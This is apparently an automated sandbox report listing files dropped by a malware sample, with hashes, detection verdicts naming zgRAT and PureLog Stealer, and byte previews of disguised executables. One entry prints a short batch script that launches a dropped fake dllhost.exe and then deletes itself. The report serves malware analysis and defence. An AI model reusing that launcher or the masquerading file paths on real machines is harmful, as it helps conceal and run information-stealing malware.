SSDEEP:	48:6omRtWxZ8RxeOAkFJOcV4MKe28d7KvqBHruulB+hnqXSfbNtm:uhxvxVx92vkdTkZzNt
MD5:	D499BAFB3BBA562EB4161CA4D64639DA
SHA1:	50EE1B95D8FBC876BD0C6E2BC7DA143A26ECA6E5
SHA-256:	8FFFF6FE802AF0B8A9B55FE7967230316D740E654D1691C393EBDB67DB8F5BC6
SHA-512:	621BE46B18890AC0D132CDF673A062414E645C53740DC01727545F1A0668D3FE7CEA55C994374333017B73347F23389C914B5C6E390ECD4EB262AA462E3B6C67
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-9mg.............................'... ...@....@.. ....................................@.................................@'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\Program Files (x86)\Windows Portable Devices\466f9f2ea1ce8d

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	5.069146220500345
Encrypted:	false
SSDEEP:	3:z5SIUMJSRj0aDKctVs:1mp0Ita
MD5:	DD83461A86FFD99B11005721A6AB9F0B
SHA1:	2CB8721A4FCF6543DEA131FE0669B1EE9F6F11BC
SHA-256:	F2E46315B3FA72BDD4B92060827C57B839CC42799CC60E708F58AB373985C287
SHA-512:	D5DF9D5064B95B57E77DAFF7A006E306B0FA4016D6AC85D8A6C91B69EDC5D929DDA4AD97E0E97AED94F73B721339D7ACC74AA6D6BEF629A8A6E40B8781D4B95B
Malicious:	false
Preview:	3FSmVYRe4e7mE4Hk8y3UN3Gf1f5lFHgEv1sUnO68NaTwT8NbAGg999zA9xuz

C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1790464
Entropy (8bit):	7.485066925729337
Encrypted:	false
SSDEEP:	24576:Gr9jPHLY0g5fcMpx/mWJXZiz9sFMY5EXzn+O8sU1ISTbhpIcN2RN+fgiPM8whrPU:czLYJTFoK4XznW2ElpI9RXich7h
MD5:	E741574F3B1602BA40508C8EE4E8CD26
SHA1:	4E833F7742AB4A26EDDB60A87EFE74DFC0A849DB
SHA-256:	CA4F177F6257475CE968EF0028C585F038C36CF799BAFC9F08E0519F6D154533
SHA-512:	EF70F73FB3A53CBEB99FE163EC98DCC85D95E4002B579776FF03D87CE767BF87AB412C339CA2065310AC1CAFCB0D126F8E54F2AB1616D977BDC37A331B6F8FCE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2ag.................J..........Nh... ........@.. ....................................@..................................h..K....... ............................................................................ ............... ..H............text...TH... ...J.................. ..`.rsrc... ............L..............@....reloc...............P..............@..B................0h......H.......D...................[...tg.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~y...{....9....& ....8....(.... ....~y...{....:....& ....8....(.... ....~y...{j...:....& ....8y......0.......... ........8........E....z...5...................k...8u...r...ps....z8.... ....~y...{....:....& ....8....~....(M... .... .... ....s....~....(Q....... ....8t...8.... ....8e......... ....~y...{....9K...& ....8@...~....9.... ...

C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\466f9f2ea1ce8d

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	203
Entropy (8bit):	5.76590481219404
Encrypted:	false
SSDEEP:	6:gPdHfgrW/UJY3eDdOqTE7hxXG+bxHMWgM+Q:gPN4rI3qYZ7hxXG+bhMWWQ
MD5:	75CCBEF15455569DEF4F220F13EF5B46
SHA1:	94D297A2947209F3FFBED9CF288AB742B6135BF0
SHA-256:	37DB62DB1FB7695F104B13982A8B2DE1119E2FBE84B11F7837564F321A9020EE
SHA-512:	454BF673125987BE6AB2B50D559768931FF81F371DA5676497DBE8FA32812C8933074529E0B037FAE99A4559C18049442F19392D5FA242D0D08B7317A0D74C37
Malicious:	false
Preview:	w6t24GwkTL3Rek8lhEvBsU0eHghBgzaGAPNJwHE2CZql0h8FZLayGLdbGPuYjvDeuxROWzya929SoOnjicmVYm9zvwDhWqTRWM1DPtskWAyOLLx1mL0HIrFIxbckvRDTir5cXjTytB9Yxvnk8L5LzMIoGtQyQIzF6fpdPUeC1BXHsrUBy2ljW2eWjQVnTfilM3cRGJUnr2U

C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1790464
Entropy (8bit):	7.485066925729337
Encrypted:	false
SSDEEP:	24576:Gr9jPHLY0g5fcMpx/mWJXZiz9sFMY5EXzn+O8sU1ISTbhpIcN2RN+fgiPM8whrPU:czLYJTFoK4XznW2ElpI9RXich7h
MD5:	E741574F3B1602BA40508C8EE4E8CD26
SHA1:	4E833F7742AB4A26EDDB60A87EFE74DFC0A849DB
SHA-256:	CA4F177F6257475CE968EF0028C585F038C36CF799BAFC9F08E0519F6D154533
SHA-512:	EF70F73FB3A53CBEB99FE163EC98DCC85D95E4002B579776FF03D87CE767BF87AB412C339CA2065310AC1CAFCB0D126F8E54F2AB1616D977BDC37A331B6F8FCE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2ag.................J..........Nh... ........@.. ....................................@..................................h..K....... ............................................................................ ............... ..H............text...TH... ...J.................. ..`.rsrc... ............L..............@....reloc...............P..............@..B................0h......H.......D...................[...tg.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~y...{....9....& ....8....(.... ....~y...{....:....& ....8....(.... ....~y...{j...:....& ....8y......0.......... ........8........E....z...5...................k...8u...r...ps....z8.... ....~y...{....:....& ....8....~....(M... .... .... ....s....~....(Q....... ....8t...8.... ....8e......... ....~y...{....9K...& ....8@...~....9.... ...

C:\Program Files\Windows Security\BrowserCore\5940a34987c991

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	ASCII text, with very long lines (593), with no line terminators
Category:	dropped
Size (bytes):	593
Entropy (8bit):	5.869195276981034
Encrypted:	false
SSDEEP:	12:B1qEL2bx81rMADLEzXqC/1GOgLr7JckPZl+9DQtQVks3vkS/7x:/lLI81rMADOnNgnqd9DCRYT7x
MD5:	C2C765BCD24F794096DB29DA975C4DBE
SHA1:	E849243DA51D0DD6F77E1F29B376EB23C410D710
SHA-256:	2FF321E5FAC2C3DD85757BEBE065F24A330CB2E805C61A587001A3BEB47AD3D9
SHA-512:	1AF29FB31D4837FB2B116DDDF524FFBA56BAD697AACD22CE60483719732D2B9B48CC7E165396B6C35992CE4D828542A90659F3084116235153E091080B68C076
Malicious:	false
Preview:	eoYlVwurhipWcvYptlDcivXg4WBqvJ5TogPvmdWkzj5elXc29viwxMCtR2q8uD5XnWr5fnCPPdn8z25h4JrAkJgcdgetxXzvoi1OqgWVsTgTiD3Y6IEkW5we0Oc8JTc1n2URBq1XwWSRmM3ZnGxoTPZtvWYbEXMZ0pqqtlWQQrxAmf2nUCVCfyiYdlgoSaSZJ3b7fNpCuhXlbYGPeuHBCJ3CGSNIFr70YY0tE5IHWTS8a66EeQJhSQW99Y0NAh7CjhNCiXLjm9pt14mKVJoyhZhHB1tpE4GzVPZ3t4gHFk5TlnIFwq213IeJ9FBrnfer30Xlfsabmgt7eOgYto3YCP5NuQ3n3yejFNavPgjDPbOWYhoujm78mGpn4J0PywhyCJ2QyvIMEzJkBjyNlJDQ1f79iw0GpUOc3aUOpY5yev3x6ElVUnoptR6gM2sB4CgukqrlOjhMNOwFlKCdKfvCqjtldxCwp44cOJMQXAGvFbcef14C0P0ZQeDB7FIahvgTUT1c7vFKYA7PGPGl3A5aDfLuFLTR2pNU4JJLAcEEJqAQhy4s9ghgzGQzIGWwcyStwmU7F4la60RWe4NQQ

C:\Program Files\Windows Security\BrowserCore\dllhost.exe

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1790464
Entropy (8bit):	7.485066925729337
Encrypted:	false
SSDEEP:	24576:Gr9jPHLY0g5fcMpx/mWJXZiz9sFMY5EXzn+O8sU1ISTbhpIcN2RN+fgiPM8whrPU:czLYJTFoK4XznW2ElpI9RXich7h
MD5:	E741574F3B1602BA40508C8EE4E8CD26
SHA1:	4E833F7742AB4A26EDDB60A87EFE74DFC0A849DB
SHA-256:	CA4F177F6257475CE968EF0028C585F038C36CF799BAFC9F08E0519F6D154533
SHA-512:	EF70F73FB3A53CBEB99FE163EC98DCC85D95E4002B579776FF03D87CE767BF87AB412C339CA2065310AC1CAFCB0D126F8E54F2AB1616D977BDC37A331B6F8FCE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Security\BrowserCore\dllhost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2ag.................J..........Nh... ........@.. ....................................@..................................h..K....... ............................................................................ ............... ..H............text...TH... ...J.................. ..`.rsrc... ............L..............@....reloc...............P..............@..B................0h......H.......D...................[...tg.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~y...{....9....& ....8....(.... ....~y...{....:....& ....8....(.... ....~y...{j...:....& ....8y......0.......... ........8........E....z...5...................k...8u...r...ps....z8.... ....~y...{....:....& ....8....~....(M... .... .... ....s....~....(Q....... ....8t...8.... ....8e......... ....~y...{....9K...& ....8@...~....9.... ...

C:\Users\Default\Pictures\69ddcba757bf72

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	ASCII text, with very long lines (848), with no line terminators
Category:	dropped
Size (bytes):	848
Entropy (8bit):	5.895742088157547
Encrypted:	false
SSDEEP:	24:RmoO6FnMjU+zum4pP5HDE434MR6Rmyz/SXw:NiTE5HHoBogaA
MD5:	EB40B3BA5EB569CC5BF869E1AFC83E50
SHA1:	6E818903EC055C2A78DB3F22B3FE296BD19B6457
SHA-256:	F8B72E656615C8840F38279086B9B48E21DB6B4647116A6EC40CB20EEDC4F7A8
SHA-512:	519782FB7874DA12B1E26789FA3727841ADB8480F3CBA5762A689D5D7D5B8162B7D377F6E87FF17D4445230C3C13F4EC32B1666E1530C031C6E16B4D1F020405
Malicious:	false
Preview:	K8UCFIKVTVziWPeVvWoClnySr8n0wHZMSCTjVfcMw4vLVgj535C3rmPgKBUGeUiL5nPU649P3bQr1n7LYs61FfeqwxZULWrcVkPrQP986wAPWiogDJrwXrFaJjiJfoEgtyVRYQ4Js74SfOUOI3QCo5Enezirq0dRsdghMWHxOiDZwx44OTAlXC2ytsxjrNd2dnkCswBvvdxG2o0r4ncWz23qkryeihFAFL6JM1MbSOz4Ow5F1GoDuGClt4bA8hMNXxBrsreCbBElC9byvsmc3CP9IUZRZLcuBlhbvOWKllltBbjudnOP4uUVhCiYRMnQiUjab9ChWc0Rag7rupyw6N0QQM4tq73Z8VLr1ISdlr3c4D4AE1nlX1TUdSJPFT0YibSEUQzmWVKPTXWNR3pyURBHC0Nj8DXS0e3du0qxCBPCqDAG667LoCEQZKBdDPnS72Yzd2cbN1wTC8b8zGnCFLoyamDkyMuwY6ExpLmDdg8wPvOatCn6mkMvOkY0z2mAH94F4nToejjjN1ipYn0vixJxtSjFwvOk38oQ0IgFt9cCBniWBtcMC1bU0HVlEO1sV8pPMSyPGvCjVHwGuMDDSCiCgUatx4BeItqD7TKt4NFQy28sUP12KyZTZms12FcLthblatIbCUIF6ROoVrYhDITUTWnVkS0zu3hRaXSlGaz0pUXHYEfLq4IkNHRDFx1tdTUDu6N8YxanTdo99g7fwpI0u6DTFPfTjGXV9UWb0hw3efRucSDjzV7xLeSy343ISGEMFSApJfoP3PWPoT0xM5eNIjKfBih6onlXbEoJSXaTqs46IDKkDF6Wm0EfIeol8slPn8yjorfyfKha

C:\Users\Default\Pictures\smss.exe

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1790464
Entropy (8bit):	7.485066925729337
Encrypted:	false
SSDEEP:	24576:Gr9jPHLY0g5fcMpx/mWJXZiz9sFMY5EXzn+O8sU1ISTbhpIcN2RN+fgiPM8whrPU:czLYJTFoK4XznW2ElpI9RXich7h
MD5:	E741574F3B1602BA40508C8EE4E8CD26
SHA1:	4E833F7742AB4A26EDDB60A87EFE74DFC0A849DB
SHA-256:	CA4F177F6257475CE968EF0028C585F038C36CF799BAFC9F08E0519F6D154533
SHA-512:	EF70F73FB3A53CBEB99FE163EC98DCC85D95E4002B579776FF03D87CE767BF87AB412C339CA2065310AC1CAFCB0D126F8E54F2AB1616D977BDC37A331B6F8FCE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\Pictures\smss.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Pictures\smss.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Pictures\smss.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\Pictures\smss.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2ag.................J..........Nh... ........@.. ....................................@..................................h..K....... ............................................................................ ............... ..H............text...TH... ...J.................. ..`.rsrc... ............L..............@....reloc...............P..............@..B................0h......H.......D...................[...tg.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~y...{....9....& ....8....(.... ....~y...{....:....& ....8....(.... ....~y...{j...:....& ....8y......0.......... ........8........E....z...5...................k...8u...r...ps....z8.... ....~y...{....:....& ....8....~....(M... .... .... ....s....~....(Q....... ....8t...8.... ....8e......... ....~y...{....9K...& ....8@...~....9.... ...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ComwebDriverbroker.exe.log

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1599
Entropy (8bit):	5.360523825072636
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs1HmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj1GqZ4vtpv
MD5:	6835C0A832A2A8F7D3F0F06A52CFED87
SHA1:	3B0E1AB21D0725793EB5E40A3E5BED99ABC6C864
SHA-256:	E58903097CAA5981BD22E9B59BA98A539F4510DA1C77E5A6BF428F7BC2A95A53
SHA-512:	0C95C3B96D650FB743833EB9DFBB9121E1F1A5E0477BE897D82E12D86A9FBC764A4BC8ACF67C0E2C4F0181296A98CB5022D877781458F930DCF38F61CB6F7991
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\HpNAzDiYON.bat

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	188
Entropy (8bit):	5.180965907391225
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mbZjgL8eAHX3XY/JYWtACSBktKcKZG1N+E2J5xAIAF:hCRLuVFOOr+DEiUDMsKOZG1N723fhq
MD5:	4945F4A0325AC3969534BF87610E3048
SHA1:	4E6A68400B9A3DE15CA0498999835767C96EB031
SHA-256:	A4304528700EFCA2FBD03BAE7231526C68C277F418D30FA10AEF0A8034F8F0A0
SHA-512:	126C3B4BD88F75896999F485DDBFB372C51E69C22091FDAEAD0D91ED26E0428DAA8C581840D08A83EA1A3074BB8722CCD422A3D7EAA54B10D1A9EBFCA32051E0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Security\BrowserCore\dllhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\HpNAzDiYON.bat"

C:\Users\user\AppData\Local\Temp\OX8X73irOu

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.133660689688186
Encrypted:	false
SSDEEP:	3:nczz2dG/o:nCz2J
MD5:	0614D578191437331C347D54C9BEAAC4
SHA1:	7FF524B11D59437F9D3D966BD7589C5AFB9329C3
SHA-256:	10A430F153BDB03896E5592FF0CFC32075A293CF28B36336D1F95834F96D4B76
SHA-512:	D2122959118B1B233D88E54118D3BCFDFF4955222684076DF088A870E305FAD60567F1D711B81A5E192A76DA2C2C44AFDCAF5C39D7484256A8F1E6233EE96E2F
Malicious:	false
Preview:	kAJBxtyV7GpSJOk6VkI0cSn04

C:\Users\user\AppData\Local\Temp\RESAB2D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Thu Dec 26 11:08:29 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1932
Entropy (8bit):	4.603163283508907
Encrypted:	false
SSDEEP:	24:HLfW9GLzlbLaHKFwKCmxNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+5gcN:bNLzZ2rKCmxslmuulB+hnqXSfbNtmh5N
MD5:	B02B0FC3BF0D2877B65115ABF775F16E
SHA1:	549942412C01D2B19FD60D5F8E1C71CC8937AC06
SHA-256:	7759FD81B84788682C64671D20CC90B0F896411E87D38458781C0136B936BE03
SHA-512:	7BE889F531487D34824F81BCA61222A3C029B7F7E53E0381AC9E32F896D6B478A0DC01288C2C0506DCFE844513CBA433AB47D7E14707903B39765C883F8679DB
Malicious:	false
Preview:	L...-9mg.............debug$S........\...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........X....c:\Program Files (x86)\Microsoft\Edge\Application\CSC5F50EFF8B17D43B99D465AE8464D9.TMP...................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RESAB2D.tmp.-.<....................a..Microsoft (R) CVTRES.e.=..cwd.C:\portcomSurrogateRefSession.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.

C:\Users\user\AppData\Local\Temp\RESAD70.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f0, 10 symbols, created Thu Dec 26 11:08:30 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1960
Entropy (8bit):	4.5518484477415155
Encrypted:	false
SSDEEP:	24:HenjS9YVXOXXZaH3wKCmxNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+GUZ:+bgXEgKCmxEluOulajfqXSfbNtmhxZ
MD5:	68BE31918C7401E2B071F518E4F56B20
SHA1:	935ACA67EE5B6E0E13EB5ECE6D1C91544704EF65
SHA-256:	02207D212BE161C3C4D333A5C9A76381C1D32FA75A61B1E7451FCEBBC56908CF
SHA-512:	0CBA00A4957E8116CBACA9582DD4733480F482E4A35621994BA93C6CBB8BB9144FCE3F3EA30EF218D607305FE4FD4DD7971DF0FD210BF3188A6A22518F436203
Malicious:	false
Preview:	L....9mg.............debug$S........@...................@..B.rsrc$01................l...........@..@.rsrc$02........p...................@..@........<....c:\Windows\System32\CSCE93499D36A1149A8864C8A5B6E525A2.TMP..................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RESAD70.tmp.-.<....................a..Microsoft (R) CVTRES.e.=..cwd.C:\portcomSurrogateRefSession.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2pbk5fzd.yfv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dsjqbri.5qh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_an3lrxuq.01i.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c2h1xzo2.vt4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvpgowxt.ery.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_euuxvwqh.zaj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
